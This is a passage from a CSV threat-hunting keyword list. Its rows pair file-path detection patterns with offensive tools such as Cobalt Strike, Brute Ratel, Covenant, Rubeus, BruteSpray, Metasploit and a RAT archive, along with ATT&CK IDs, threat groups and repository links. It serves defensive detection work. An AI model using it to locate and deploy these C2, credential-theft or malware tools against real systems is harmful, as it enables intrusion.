tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5828" "*/Brute/BruteStager*",".{0,1000}\/Brute\/BruteStager.{0,1000}","offensive_tool_keyword","covenant","Covenant is a 
collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","5829" "*/bruteforce.py*",".{0,1000}\/bruteforce\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","5830" "*/bruteforce-ftp.py*",".{0,1000}\/bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5831" "*/bruteforce-http.py*",".{0,1000}\/bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5832" "*/Bruteforcer.*",".{0,1000}\/Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","5833" "*/bruteforce-rdp.py*",".{0,1000}\/bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5834" "*/bruteforce-smb.py*",".{0,1000}\/bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5835" "*/bruteforce-ssh.py*",".{0,1000}\/bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5836" "*/bruteratel*",".{0,1000}\/bruteratel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized 
Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5837" "*/brute-ratel-armx64*",".{0,1000}\/brute\-ratel\-armx64.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5838" "*/brute-ratel-linx64*",".{0,1000}\/brute\-ratel\-linx64.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5839" "*/brutereflect.dll*",".{0,1000}\/brutereflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary 
Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5840" "*/BruteSploit*",".{0,1000}\/BruteSploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","5841" "*/brutespray.git*",".{0,1000}\/brutespray\.git.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","5842" "*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","5843" "*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5844" "*/brutespray_*",".{0,1000}\/brutespray_.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","5845" "*/BruteStager.cs*",".{0,1000}\/BruteStager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","5846" "*/BucketLoot.git*",".{0,1000}\/BucketLoot\.git.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - 
TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","5849" "*/build/encrypted_shellcode*",".{0,1000}\/build\/encrypted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5850" "*/build/formatted_shellcode*",".{0,1000}\/build\/formatted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode 
Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5851" "*/build/shellcode*",".{0,1000}\/build\/shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5852" "*/build_arsenal_kit.sh*",".{0,1000}\/build_arsenal_kit\.sh.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","5853" "*/BuildBOFs/*",".{0,1000}\/BuildBOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","5854" "*/burp/releases/community/latest*",".{0,1000}\/burp\/releases\/community\/latest.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","5855" "*/burp-api/*",".{0,1000}\/burp\-api\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","5856" "*/burp-Dirbuster*",".{0,1000}\/burp\-Dirbuster.{0,1000}","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/vulnersCom/burp-Dirbuster","1","1","#linux","N/A","N/A","1","70","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z","5857" "*/burpee.py*",".{0,1000}\/burpee\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","N/A","10","10","385","34","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z","5858" "*/BurpExtender.java*",".{0,1000}\/BurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","5859" "*/burp-proxy*",".{0,1000}\/burp\-proxy.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5860" "*/BurpSuite-collections*",".{0,1000}\/BurpSuite\-collections.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","5861" "*/BUYTHEAPTDETECTORNOW*",".{0,1000}\/BUYTHEAPTDETECTORNOW.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5862" "*/BX RAT V*.exe*",".{0,1000}\/BX\sRAT\sV.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5863" "*/BX RAT.exe*",".{0,1000}\/BX\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5864" "*/byakugan.cpp*",".{0,1000}\/byakugan\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5865" "*/byakugan.dll*",".{0,1000}\/byakugan\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5866" "*/bypass.vbs*",".{0,1000}\/bypass\.vbs.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
